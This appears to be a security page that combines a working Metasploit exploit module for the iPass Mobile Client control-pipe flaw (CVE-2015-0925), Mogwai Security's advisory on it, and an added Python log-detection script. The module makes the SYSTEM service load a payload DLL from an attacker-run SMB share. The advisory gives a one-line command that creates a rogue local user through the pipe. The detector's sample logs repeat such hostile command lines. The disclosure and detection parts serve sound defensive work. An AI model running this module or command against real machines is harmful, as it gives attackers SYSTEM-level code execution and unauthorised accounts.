-
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IPass Control Pipe Remote Command Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the IPass Client service. This service provides a
        named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
        to force the service to load a DLL from a SMB share.
      },
      'Author'         =>
        [
          'Matthias Kaiser', # Vulnerability discovery
          'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-0925' ],
          [ 'OSVDB', '117423' ],
          [ 'BID', '72265' ],
          [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows x32', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jan 21 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
      ], self.class)

    deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
  end

  def check
    echo_value = rand_text_alphanumeric(rand(10) + 10)

    begin
      response = send_command("System.Echo #{echo_value}")
      if response =~ Regexp.new(echo_value)
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Unknown
      end
    rescue Rex::ConnectionError => e
      vprint_error("Connection failed: #{e.class}: #{e}")
      return Msf::Exploit::CheckCode::Unknown
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      vprint_error('Connection reset during login')
      return Msf::Exploit::CheckCode::Unknown
    end
  end

  def setup
    super
    self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
    self.share = Rex::Text.rand_text_alpha(5)
  end

  def primer
    self.file_contents = generate_payload_dll
    print_status("File available on #{unc}...")
    send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
  end

  def send_command(command)
    # The connection is closed after each command, so we have to reopen it
    connect
    smb_login
    pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
    pipe.write(Rex::Text.to_unicode(command))
    response = Rex::Text.to_ascii(pipe.read)

    response
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) { super }
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
end
```
-
Mogwai Security Advisory MSA-2015-03
----------------------------------------------------------------------
Title: iPass Mobile Client service local privilege escalation
Product: iPass Mobile Client
Affected versions: iPass Mobile Client 2.4.2.15122 (Newer versions might also be affected)
Impact: medium
Remote: no
Product link: http://www.ipass.com/laptops/
Reported: 11/03/2015
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)

Vendor's Description of the Software:
----------------------------------------------------------------------
The iPass Open Mobile client for laptops is lightweight and always on. It provides easy, seamless connectivity across iPass, customer, and third-party networks, and allows you to mix and match carrier networks without disrupting your users.

The iPass Open Mobile client for laptops allows organizations to provide granular options for how employees connect to iPass Wi-Fi (the iPass Mobile Network), campus Wi-Fi, mobile broadband (3G/4G), Ethernet, and dial, using a single platform to manage all connections.

Open Mobile also enables cost and security controls that provide virtual private network (VPN) integration options; mobile broadband 3G/4G usage controls for both data roaming and data usage; endpoint integrity verification that checks the security of the device at the point of connection; and several additional options for setting network connection and restriction policies. Insight into an organization's mobility usage is provided through user and device activity and summary reports as well as mobile broadband usage reports.

-----------------------------------------------------------------------
Vendor response:
-----------------------------------------------------------------------
"We do not consider this a vulnerability as it is how the product was designed"

Business recommendation:
-----------------------------------------------------------------------
Disable the iPass service unless really required

-- CVSS2 Ratings ------------------------------------------------------
CVSS Base Score: 5.6
Impact Subscore: 7.8
Exploitability Subscore: 3.9
CVSS v2 Vector (AV:L/AC:L/Au:N/C:P/I:C/A:N)
-----------------------------------------------------------------------

Vulnerability description:
----------------------------------------------------------------------
The iPass Open Mobile Windows Client uses named pipes for interprocess communication. One of these pipes accepts commands and forwards them to the iPass plugin subsystem.

A normal user can communicate with this pipe through the command line client EPCmd.exe, which is part of the iPass suite. A list of available commands can be displayed via "System.ListAllCommands".

The iPass pipe provides an "iPass.EventsAction.LaunchAppSysMode" command which allows arbitrary commands to be executed as SYSTEM. A normal user can abuse this to escalate their local privileges.

Please note that this issue can also be exploited remotely in version 2.4.2.15122, as the named pipe can also be called via SMB. However, according to our information, the pipe is no longer remotely accessible in current versions of the iPass Mobile client.

Proof of concept:
----------------------------------------------------------------------
The following EPCmd command line creates a local user "mogwai" with password "mogwai":

EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c net user mogwai mogwai /ADD;;

Disclosure timeline:
----------------------------------------------------------------------
10/03/2015: Requesting security contact from iPass sales
10/03/2015: Sales responded, will forward vulnerability information to the development
11/03/2015: Sending vulnerability details
11/03/2015: iPass asks which customer we represent
11/03/2015: Responding that we don't represent any iPass customer
12/03/2015: iPass responded, won't fix, says that the product works as designed

Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab

----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de
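For hosts where the service cannot be disabled, the pipe and command names from the advisory and module above can drive detection. The following is an added example, not part of the advisory or the module: it flags local use of the pipe commands in process-creation events and remote opens of the pipe over IPC$. The JSON field names and the sample events are constructed assumptions.

```python
import json
import re

# Pipe commands named in the advisory and module above, with what each implies.
PIPE_COMMANDS = {
    "system.listallcommands": "pipe command enumeration",
    "ipass.eventsaction.launchappsysmode": "SYSTEM process launch via pipe command",
    "ipass.swupdateassist.registercom": "DLL registration via pipe command",
}
PIPE_NAME = "ipefsyspcpipe"                      # pipe opened by the module
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")   # \\host\share

# Constructed sample events. Field names are assumptions, loosely modelled on
# Windows events 4688 (process creation) and 5145 (share object access).
SAMPLE_LOG = r'''
{"id": 4688, "user": "alice", "cmd": "EPCmd.exe System.ListAllCommands"}
{"id": 4688, "user": "alice", "cmd": "EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\\windows\\system32\\cmd.exe;\"/c whoami\";;"}
{"id": 4688, "user": "bob", "cmd": "EPCmd.exe iPass.SWUpdateAssist.RegisterCOM \\\\198.51.100.7\\share\\x.dll"}
{"id": 5145, "user": "svc", "share": "\\\\*\\IPC$", "target": "IPEFSYSPCPIPE", "src": "198.51.100.7"}
{"id": 5145, "user": "svc", "share": "\\\\*\\IPC$", "target": "srvsvc", "src": "198.51.100.7"}
{"id": 4688, "user": "carol", "cmd": "notepad.exe report.txt"}
'''


def detect(log_text):
    """Return (event_id, user, reason) for events that touch the iPass pipe."""
    findings = []
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        if ev["id"] == 4688:
            cmd = ev.get("cmd", "")
            for name, reason in PIPE_COMMANDS.items():
                if name in cmd.lower():
                    if UNC_RE.search(cmd):
                        reason += " with UNC path"
                    findings.append((4688, ev["user"], reason))
        elif ev["id"] == 5145:
            # Remote pipe opens appear as IPC$ access with the pipe as target.
            share = ev.get("share", "").lower()
            if share.endswith("ipc$") and ev.get("target", "").lower() == PIPE_NAME:
                findings.append((5145, ev["user"],
                                 "remote open of control pipe from " + ev["src"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Event 4688 only carries the command line when command-line auditing is enabled, and 5145 is only written when the Detailed File Share audit subcategory is on.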